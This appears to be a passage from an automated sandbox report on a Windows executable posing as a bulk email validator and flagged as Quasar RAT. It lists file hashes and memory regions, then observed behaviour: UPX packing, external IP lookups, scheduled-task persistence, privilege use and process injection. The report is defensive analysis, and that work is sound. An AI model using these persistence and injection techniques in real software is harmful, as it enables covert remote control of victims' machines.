C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-math-l1-1-0.dll

MD5 c4cac2d609bb5e0da9017ebb535634ce
SHA1 51a264ce4545a2f0d9f2908771e01e001b4e763e
SHA256 7c3336c3a50bf3b4c5492c0d085519c040878243e9f7d3ea9f6a2e35c8f1f374
SHA512 3b55bdbc5132d05ab53852605afe6ed49f4b3decdde8b11f19a621a78a37d98c7aeaaa8c10bf4565b9b50162816305fa5192ee31950a96dc08ae46bfc6af4ffe

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-process-l1-1-0.dll

MD5 d8a5c1960281ec59fd4164c983516d7c
SHA1 29e6feff9fb16b9d8271b7da6925baf3c6339d06
SHA256 12bb3f480ec115d5f9447414525c5dcd236ed48356d5a70650541c9499bc4d19
SHA512 c97aa4029bcd8ffc490547dd78582ac81049dded2288102b800287a7fb623d9fde327702f8a24dfe2d2d67b2c9aaf97050756474faa4914ca4cb6038449c64bf

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-runtime-l1-1-0.dll

MD5 dbd23405e7baa8e1ac763fa506021122
SHA1 c50ae9cc82c842d50c4317034792d034ac7eb5be
SHA256 57fe2bab2acb1184a468e45cebe7609a2986d5220bb2d82592b9ca6e22384f89
SHA512 dafea32e44224b40dcc9ca96fd977a7c14128ca1dd0a6144844537d52ba25bcec83c2fa94a665a7497be9e079e7fc71298b950e3a8a0c03c4a5c8172f11063b9

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-stdio-l1-1-0.dll

MD5 5df2410c0afd30c9a11de50de4798089
SHA1 4112c5493009a1d01090ccae810500c765dc6d54
SHA256 e6a1ef1f7c1957c50a3d9c1d70c0f7b0d8badc7f279cd056eb179dc256bfefda
SHA512 8ecb79078d05d5b2a432f511953985b3253d5d43d87709a5795709ee8dbca63c5f1166ed94d8984c13f2ea06adfa7d6b82c6735c23c6e64f2f37a257066864e6

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-runtime-l1-1-0.dll

MD5 dbd23405e7baa8e1ac763fa506021122
SHA1 c50ae9cc82c842d50c4317034792d034ac7eb5be
SHA256 57fe2bab2acb1184a468e45cebe7609a2986d5220bb2d82592b9ca6e22384f89
SHA512 dafea32e44224b40dcc9ca96fd977a7c14128ca1dd0a6144844537d52ba25bcec83c2fa94a665a7497be9e079e7fc71298b950e3a8a0c03c4a5c8172f11063b9

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-stdio-l1-1-0.dll

MD5 5df2410c0afd30c9a11de50de4798089
SHA1 4112c5493009a1d01090ccae810500c765dc6d54
SHA256 e6a1ef1f7c1957c50a3d9c1d70c0f7b0d8badc7f279cd056eb179dc256bfefda
SHA512 8ecb79078d05d5b2a432f511953985b3253d5d43d87709a5795709ee8dbca63c5f1166ed94d8984c13f2ea06adfa7d6b82c6735c23c6e64f2f37a257066864e6

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-process-l1-1-0.dll

MD5 d8a5c1960281ec59fd4164c983516d7c
SHA1 29e6feff9fb16b9d8271b7da6925baf3c6339d06
SHA256 12bb3f480ec115d5f9447414525c5dcd236ed48356d5a70650541c9499bc4d19
SHA512 c97aa4029bcd8ffc490547dd78582ac81049dded2288102b800287a7fb623d9fde327702f8a24dfe2d2d67b2c9aaf97050756474faa4914ca4cb6038449c64bf

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-math-l1-1-0.dll

MD5 c4cac2d609bb5e0da9017ebb535634ce
SHA1 51a264ce4545a2f0d9f2908771e01e001b4e763e
SHA256 7c3336c3a50bf3b4c5492c0d085519c040878243e9f7d3ea9f6a2e35c8f1f374
SHA512 3b55bdbc5132d05ab53852605afe6ed49f4b3decdde8b11f19a621a78a37d98c7aeaaa8c10bf4565b9b50162816305fa5192ee31950a96dc08ae46bfc6af4ffe

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-string-l1-1-0.dll

MD5 aacade02d7aaf6b5eff26a0e3a11c42d
SHA1 93b8077b535b38fdb0b7c020d24ba280adbe80c3
SHA256 e71d517e6b7039437e3fc449d8ad12eeeca0d5c8ed1c500555344fd90ddc3207
SHA512 e02fcbcb70100f67e65903d8b1a7e6314cabfb0b14797bd6e1c92b7bcb3994a54133e35d16da0a29576145b2783221330591526f856b79a25c0575fc923985a6

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-string-l1-1-0.dll

MD5 aacade02d7aaf6b5eff26a0e3a11c42d
SHA1 93b8077b535b38fdb0b7c020d24ba280adbe80c3
SHA256 e71d517e6b7039437e3fc449d8ad12eeeca0d5c8ed1c500555344fd90ddc3207
SHA512 e02fcbcb70100f67e65903d8b1a7e6314cabfb0b14797bd6e1c92b7bcb3994a54133e35d16da0a29576145b2783221330591526f856b79a25c0575fc923985a6

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-time-l1-1-0.dll

MD5 0d9afb006f46478008c180b9da5465ac
SHA1 3be2f543bbc8d9f1639d0ed798c5856359a9f29b
SHA256 c3a70153e1d0ecd1cbf95de033bfef5cfecabe7a8274cafe272cc2c14865cd8c
SHA512 4bd76efcb2432994d10884c302aee6cadbc2d594bbbd4e654c1e8547a1efd76fd92e4879b8120dfacb5e8a77826009f72faa5727b1aa559ed3fc86d0ce3ed029

C:\Users\Admin\AppData\Local\Temp\_MEI23402\VCRUNTIME140.dll

MD5 0e675d4a7a5b7ccd69013386793f68eb
SHA1 6e5821ddd8fea6681bda4448816f39984a33596b
SHA256 bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1
SHA512 cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-time-l1-1-0.dll

MD5 0d9afb006f46478008c180b9da5465ac
SHA1 3be2f543bbc8d9f1639d0ed798c5856359a9f29b
SHA256 c3a70153e1d0ecd1cbf95de033bfef5cfecabe7a8274cafe272cc2c14865cd8c
SHA512 4bd76efcb2432994d10884c302aee6cadbc2d594bbbd4e654c1e8547a1efd76fd92e4879b8120dfacb5e8a77826009f72faa5727b1aa559ed3fc86d0ce3ed029

\Users\Admin\AppData\Local\Temp\_MEI23402\VCRUNTIME140.dll

MD5 0e675d4a7a5b7ccd69013386793f68eb
SHA1 6e5821ddd8fea6681bda4448816f39984a33596b
SHA256 bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1
SHA512 cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66

C:\Users\Admin\AppData\Local\Temp\_MEI23402\base_library.zip

MD5 ea942658e75c4365bfefcfc73a81a53d
SHA1 8e01d18719c63a1d7b0d274c7d287636fc41a3e6
SHA256 c74c7e3264883f14b86bf2c4211db1b277a488a3345c952868cf3345d7a4de22
SHA512 7010470bed8c2f52982683f3f7d9a7a884948995a45df1398a597b505f0dd05f515a1caa9189252c90b54da927a512cdb02ac927b564a9ef4461348335e0a37b

C:\Users\Admin\AppData\Local\Temp\_MEI23402\python3.dll

MD5 11a8500bc31356fae07dd604d6662efb
SHA1 4b260e5105131cdcae9313d1833cce0004c02858
SHA256 521f17a2caab35730bfdccb954704a6ffc035d4f7ea24208c76f6a45f30fd0b6
SHA512 15f967bdf3c64c7435bfa48fe4a8c3157b4568c08f396bc20fde7cb802aa0a633afaa987b1ebdf7851c6aa405e65f28d754bca8e06ff0a3b54f6da9a6d81d7c4

C:\Users\Admin\AppData\Local\Temp\_MEI23402\_ctypes.pyd

MD5 216682f01cb4fd3fbf5d31674f5ff9cf
SHA1 4b24fc944e6998280098ca207e0ea33e52767996
SHA256 8dbef8fd9ce588db70b9f35b408d361f5d0cece4cb9a9edfeb75f9532a0ea92d
SHA512 c97d96807bd8fffb55dd031482e926d0ef8923f4520083aec03bdd36d249d61e7cacde99fa7981f453408941cbec609e228f19487c780855b1add2a72fc00a98

\Users\Admin\AppData\Local\Temp\_MEI23402\python3.dll

MD5 11a8500bc31356fae07dd604d6662efb
SHA1 4b260e5105131cdcae9313d1833cce0004c02858
SHA256 521f17a2caab35730bfdccb954704a6ffc035d4f7ea24208c76f6a45f30fd0b6
SHA512 15f967bdf3c64c7435bfa48fe4a8c3157b4568c08f396bc20fde7cb802aa0a633afaa987b1ebdf7851c6aa405e65f28d754bca8e06ff0a3b54f6da9a6d81d7c4

\Users\Admin\AppData\Local\Temp\_MEI23402\_ctypes.pyd

MD5 216682f01cb4fd3fbf5d31674f5ff9cf
SHA1 4b24fc944e6998280098ca207e0ea33e52767996
SHA256 8dbef8fd9ce588db70b9f35b408d361f5d0cece4cb9a9edfeb75f9532a0ea92d
SHA512 c97d96807bd8fffb55dd031482e926d0ef8923f4520083aec03bdd36d249d61e7cacde99fa7981f453408941cbec609e228f19487c780855b1add2a72fc00a98

memory/2504-128-0x000007FEF6D30000-0x000007FEF6D54000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI23402\libffi-7.dll

MD5 b5150b41ca910f212a1dd236832eb472
SHA1 a17809732c562524b185953ffe60dfa91ba3ce7d
SHA256 1a106569ac0ad3152f3816ff361aa227371d0d85425b357632776ac48d92ea8a
SHA512 9e82b0caa3d72bb4a7ad7d66ebfb10edb778749e89280bca67c766e72dc794e99aab2bc2980d64282a384699929ce6cc996462a73584898d2df67a57bff2a9c6

\Users\Admin\AppData\Local\Temp\_MEI23402\libffi-7.dll

MD5 b5150b41ca910f212a1dd236832eb472
SHA1 a17809732c562524b185953ffe60dfa91ba3ce7d
SHA256 1a106569ac0ad3152f3816ff361aa227371d0d85425b357632776ac48d92ea8a
SHA512 9e82b0caa3d72bb4a7ad7d66ebfb10edb778749e89280bca67c766e72dc794e99aab2bc2980d64282a384699929ce6cc996462a73584898d2df67a57bff2a9c6

memory/2504-131-0x000007FEF6D20000-0x000007FEF6D2F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI23402\_bz2.pyd

MD5 71c208605d9d1a1b822ed14e40bde272
SHA1 d605b1891c2b9360344f878f7aeae90a95e1425b
SHA256 23330e593f5323caae5f992051d47d0e5b5c27c7b55c13b1e1f8869d0497725c
SHA512 410c1e009b2c65c4c42c4d926a5fe9a4a4a0744872a4497ad0bb20c40897264124bd653490cba5214a6bfdb8b5ab3681d7c796e2ffe63107da3ba65194381e09

\Users\Admin\AppData\Local\Temp\_MEI23402\_bz2.pyd

MD5 71c208605d9d1a1b822ed14e40bde272
SHA1 d605b1891c2b9360344f878f7aeae90a95e1425b
SHA256 23330e593f5323caae5f992051d47d0e5b5c27c7b55c13b1e1f8869d0497725c
SHA512 410c1e009b2c65c4c42c4d926a5fe9a4a4a0744872a4497ad0bb20c40897264124bd653490cba5214a6bfdb8b5ab3681d7c796e2ffe63107da3ba65194381e09

C:\Users\Admin\AppData\Local\Temp\_MEI23402\_lzma.pyd

MD5 c0af87822386bd3a1d44cab21c644866
SHA1 f19ce82573538a46cd150841d7b1d1adad7c0d43
SHA256 1f81f40a76ada929a590f56ffaa16c5d610fd65f89213858837ecc9b0f1952f4
SHA512 51d0b819e0d79628af6f028306ae8730b640c04bc4087d9611fbbd6d5c3b6cdc56f2357813a01168e01afe0f0b3402fa151ba009f5af3f5696735adc41a3b6db

\Users\Admin\AppData\Local\Temp\_MEI23402\_lzma.pyd

MD5 c0af87822386bd3a1d44cab21c644866
SHA1 f19ce82573538a46cd150841d7b1d1adad7c0d43
SHA256 1f81f40a76ada929a590f56ffaa16c5d610fd65f89213858837ecc9b0f1952f4
SHA512 51d0b819e0d79628af6f028306ae8730b640c04bc4087d9611fbbd6d5c3b6cdc56f2357813a01168e01afe0f0b3402fa151ba009f5af3f5696735adc41a3b6db

memory/2504-133-0x000007FEF6D00000-0x000007FEF6D1B000-memory.dmp

memory/2504-136-0x000007FEF6850000-0x000007FEF6894000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI23402\_socket.pyd

MD5 50e71ec18045021bc098b2b0aed1813b
SHA1 804685545b2633cb36d8cea8d6b0604d45da531d
SHA256 d3a48b335b62b37d467e4d36e514101bd9215f66356cb16ecf750ee78cc2d323
SHA512 cec2589a1d836be599aa1ba5c33b88feb3a805d42658cbb631fba810948f85c34382a223ac26a72b7eaf0f1d30ba2e368c3d2e4ae7ff32f25fc1d6e739f24310

\Users\Admin\AppData\Local\Temp\_MEI23402\_socket.pyd

MD5 50e71ec18045021bc098b2b0aed1813b
SHA1 804685545b2633cb36d8cea8d6b0604d45da531d
SHA256 d3a48b335b62b37d467e4d36e514101bd9215f66356cb16ecf750ee78cc2d323
SHA512 cec2589a1d836be599aa1ba5c33b88feb3a805d42658cbb631fba810948f85c34382a223ac26a72b7eaf0f1d30ba2e368c3d2e4ae7ff32f25fc1d6e739f24310

memory/2504-139-0x000007FEF6CE0000-0x000007FEF6CF9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI23402\select.pyd

MD5 9ecbd2b240256b4443b54cdb892cff71
SHA1 7a75f149b05e017f7b94fd3d07551995be53616f
SHA256 6fce6db4bafee285c9ca06b0b088aa1f18d43409125981e4e4c8954c9ee20846
SHA512 48f91ce8d273d51c27a1b9bf6c581d42e0d79b39dcb41f6e4ff202190e4b7e0d6f5e87f2933a84c0838874155608aedacbd8d20f76688732da671e5b2d6ed5f1

\Users\Admin\AppData\Local\Temp\_MEI23402\select.pyd

MD5 9ecbd2b240256b4443b54cdb892cff71
SHA1 7a75f149b05e017f7b94fd3d07551995be53616f
SHA256 6fce6db4bafee285c9ca06b0b088aa1f18d43409125981e4e4c8954c9ee20846
SHA512 48f91ce8d273d51c27a1b9bf6c581d42e0d79b39dcb41f6e4ff202190e4b7e0d6f5e87f2933a84c0838874155608aedacbd8d20f76688732da671e5b2d6ed5f1

memory/2504-142-0x000007FEF6840000-0x000007FEF684D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI23402\libcrypto-1_1.dll

MD5 32cbd9ff7c75634dd4cf282e218e5e5f
SHA1 a2d19b46736e4979a3974e4079cb43dea27a7fec
SHA256 44acd462cd91834ff39595bd022115b0f226a01b8cfefb240b3be72dbcc5be6b
SHA512 a7db2541a119701926eea097374b7d4bb281693bd01a31a019a07c0cb0988643c803c5216a295ecad670c9371760e289851df5fc5d94776544e880cb4136aa5f

C:\Users\Admin\AppData\Local\Temp\_MEI23402\_ssl.pyd

MD5 fea35ba9d29d6aac516c26d09007e2c9
SHA1 1280f308d93cc7c03c779ab174b2caf439fd47c1
SHA256 bac2fb525115bb2d231bc218d0e75d9120314521f16a097851ae96bf7ae51dc0
SHA512 4a7d6a63e255bdb621d226b61707dde66e7f1f6f462f7f7049eba05f28f07edd457ef6daf59e11ea08506c28627b1e4fbaa328c27fd048df70ff95b98d424d8e

\Users\Admin\AppData\Local\Temp\_MEI23402\_ssl.pyd

MD5 fea35ba9d29d6aac516c26d09007e2c9
SHA1 1280f308d93cc7c03c779ab174b2caf439fd47c1
SHA256 bac2fb525115bb2d231bc218d0e75d9120314521f16a097851ae96bf7ae51dc0
SHA512 4a7d6a63e255bdb621d226b61707dde66e7f1f6f462f7f7049eba05f28f07edd457ef6daf59e11ea08506c28627b1e4fbaa328c27fd048df70ff95b98d424d8e

memory/2504-146-0x000007FEF6810000-0x000007FEF6836000-memory.dmp

\Users\Admin\AppData\Local\Temp\_MEI23402\libcrypto-1_1.dll

MD5 32cbd9ff7c75634dd4cf282e218e5e5f
SHA1 a2d19b46736e4979a3974e4079cb43dea27a7fec
SHA256 44acd462cd91834ff39595bd022115b0f226a01b8cfefb240b3be72dbcc5be6b
SHA512 a7db2541a119701926eea097374b7d4bb281693bd01a31a019a07c0cb0988643c803c5216a295ecad670c9371760e289851df5fc5d94776544e880cb4136aa5f

memory/2340-149-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-utility-l1-1-0.dll

MD5 9b622ca5388b6400705c8f21550bae8e
SHA1 eb599555448bf98cdeabc2f8b10cfe9bd2181d9f
SHA256 af1e1b84f066ba05da20847bffd874d80a810b5407f8c6647b3ff9e8f7d37863
SHA512 9872f54ac744cf537826277f1c0a3fd00c5aa51f353692c1929be7bc2e3836e1a52cab2c467ba675d4052ac3116f5622755c3db8be389c179f7d460391105545

memory/2504-151-0x000007FEF5C60000-0x000007FEF5FC9000-memory.dmp

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-utility-l1-1-0.dll

MD5 9b622ca5388b6400705c8f21550bae8e
SHA1 eb599555448bf98cdeabc2f8b10cfe9bd2181d9f
SHA256 af1e1b84f066ba05da20847bffd874d80a810b5407f8c6647b3ff9e8f7d37863
SHA512 9872f54ac744cf537826277f1c0a3fd00c5aa51f353692c1929be7bc2e3836e1a52cab2c467ba675d4052ac3116f5622755c3db8be389c179f7d460391105545

C:\Users\Admin\AppData\Local\Temp\_MEI23402\libssl-1_1.dll

MD5 6eddc102f5c63f22d7862a542b0a96f0
SHA1 a7018895576bfbbdd5c437427e54de279b738233
SHA256 ca7f5b7245d5dbdabbea7d475a3687be2cbdb0007e4f8d36491ca2ff9221be1e
SHA512 113d2cbf432c0ac48265fcbbf0ae5f95ce0ef1d397a879bb539715213b47662488ffc9f4738d7dcd80861bd1acb1631ef4d30e733123931151e552a2e0f557ab

\Users\Admin\AppData\Local\Temp\_MEI23402\libssl-1_1.dll

MD5 6eddc102f5c63f22d7862a542b0a96f0
SHA1 a7018895576bfbbdd5c437427e54de279b738233
SHA256 ca7f5b7245d5dbdabbea7d475a3687be2cbdb0007e4f8d36491ca2ff9221be1e
SHA512 113d2cbf432c0ac48265fcbbf0ae5f95ce0ef1d397a879bb539715213b47662488ffc9f4738d7dcd80861bd1acb1631ef4d30e733123931151e552a2e0f557ab

memory/2340-154-0x0000000003DD0000-0x000000000441E000-memory.dmp

memory/2504-156-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI23402\_queue.pyd

MD5 9cb23d7372b166013adde2f53ba7a112
SHA1 89efeb10324b8a8a0e2d763a7087b515d2368122
SHA256 376584e748ce83446160b0315bb85bed33b31ac6e25e573fa22e56c1cf96e82a
SHA512 dcff6cc1b8b6240b9ab6ebc02ab9b085bc2a532d2c37b002e17dbbdee0a3d66f5e12c8b5dc4168fdf53dafc648152ddfcd52e0cce2c04cbf8ef9db4d601d29ac

memory/2504-157-0x000007FEF5BA0000-0x000007FEF5C55000-memory.dmp

memory/2504-158-0x000007FEF5FD0000-0x000007FEF6412000-memory.dmp

memory/2504-159-0x000007FEF67F0000-0x000007FEF67FD000-memory.dmp

memory/2504-160-0x000007FEF5AC0000-0x000007FEF5B96000-memory.dmp

memory/2504-161-0x000007FEF6D30000-0x000007FEF6D54000-memory.dmp

memory/2504-163-0x000007FEF6D00000-0x000007FEF6D1B000-memory.dmp

memory/2504-162-0x000007FEF67E0000-0x000007FEF67F0000-memory.dmp

memory/2504-164-0x000007FEF6790000-0x000007FEF67D7000-memory.dmp

memory/2504-165-0x000007FEF6850000-0x000007FEF6894000-memory.dmp

memory/2504-166-0x000007FEF5900000-0x000007FEF5A12000-memory.dmp

memory/2340-168-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-169-0x000007FEF6CE0000-0x000007FEF6CF9000-memory.dmp

memory/2504-174-0x000007FEF6840000-0x000007FEF684D000-memory.dmp

memory/320-175-0x000000001B3B0000-0x000000001B692000-memory.dmp

memory/320-176-0x0000000002360000-0x0000000002368000-memory.dmp

memory/320-178-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/320-177-0x000007FEF4DF0000-0x000007FEF578D000-memory.dmp

memory/320-179-0x000007FEF4DF0000-0x000007FEF578D000-memory.dmp

memory/2504-181-0x000007FEF6810000-0x000007FEF6836000-memory.dmp

memory/320-180-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/320-182-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/320-183-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/320-184-0x000007FEF4DF0000-0x000007FEF578D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W2SET6E92JULKA3COC84.temp

MD5 4369be6538d3041286b72edfbcea1314
SHA1 f6edf13289c7124ed262f2dee0cd1fd8eb78bcc4
SHA256 02ecd92a047d05c44975be11d5dca90c8b9abf29acce8ece7dd4c4d299bf5915
SHA512 a8015b7b4fd64b4e2382e77eece696f39fee7a491c34a9d1cf453a5c85c1f95b11d5afb516cca52747922fc42cd676561fc4a0e69272271f4620bdc773590edd

memory/2504-187-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-188-0x000007FEF5FD0000-0x000007FEF6412000-memory.dmp

memory/2504-189-0x000007FEF6D30000-0x000007FEF6D54000-memory.dmp

memory/2504-191-0x000007FEF6D00000-0x000007FEF6D1B000-memory.dmp

memory/2504-193-0x000007FEF6CE0000-0x000007FEF6CF9000-memory.dmp

memory/2504-192-0x000007FEF6850000-0x000007FEF6894000-memory.dmp

memory/2504-196-0x000007FEF5C60000-0x000007FEF5FC9000-memory.dmp

memory/2504-197-0x000007FEF5BA0000-0x000007FEF5C55000-memory.dmp

memory/2504-199-0x000007FEF5AC0000-0x000007FEF5B96000-memory.dmp

memory/2504-200-0x000007FEF67E0000-0x000007FEF67F0000-memory.dmp

memory/2024-203-0x00000000736D0000-0x0000000073C7B000-memory.dmp

memory/2024-204-0x0000000002890000-0x00000000028D0000-memory.dmp

memory/2024-205-0x00000000736D0000-0x0000000073C7B000-memory.dmp

memory/2024-207-0x0000000002890000-0x00000000028D0000-memory.dmp

memory/2024-206-0x0000000002890000-0x00000000028D0000-memory.dmp

memory/2024-213-0x00000000736D0000-0x0000000073C7B000-memory.dmp

memory/2340-214-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-215-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-216-0x000007FEF5FD0000-0x000007FEF6412000-memory.dmp

memory/2504-231-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-232-0x000007FEF5FD0000-0x000007FEF6412000-memory.dmp

memory/2504-233-0x000007FEF6D30000-0x000007FEF6D54000-memory.dmp

memory/2504-234-0x000007FEF6D20000-0x000007FEF6D2F000-memory.dmp

memory/2504-235-0x000007FEF6D00000-0x000007FEF6D1B000-memory.dmp

memory/2504-236-0x000007FEF6850000-0x000007FEF6894000-memory.dmp

memory/2504-237-0x000007FEF6CE0000-0x000007FEF6CF9000-memory.dmp

memory/2504-238-0x000007FEF6840000-0x000007FEF684D000-memory.dmp

memory/2504-239-0x000007FEF6810000-0x000007FEF6836000-memory.dmp

memory/2504-240-0x000007FEF5C60000-0x000007FEF5FC9000-memory.dmp

memory/2504-241-0x000007FEF5BA0000-0x000007FEF5C55000-memory.dmp

memory/2504-242-0x000007FEF67F0000-0x000007FEF67FD000-memory.dmp

memory/2504-243-0x000007FEF5AC0000-0x000007FEF5B96000-memory.dmp

memory/2504-244-0x000007FEF67E0000-0x000007FEF67F0000-memory.dmp

memory/2504-245-0x000007FEF6790000-0x000007FEF67D7000-memory.dmp

memory/2504-246-0x000007FEF5900000-0x000007FEF5A12000-memory.dmp

memory/2340-280-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-02 14:44

Reported

2023-12-02 14:46

Platform

win10v2004-20231127-en

Max time kernel

69s

Max time network

74s

Command Line

"C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ifconfig.me N/A N/A
N/A ifconfig.me N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4316 set thread context of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3128 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe
PID 3128 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe
PID 2148 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 4312 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4312 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
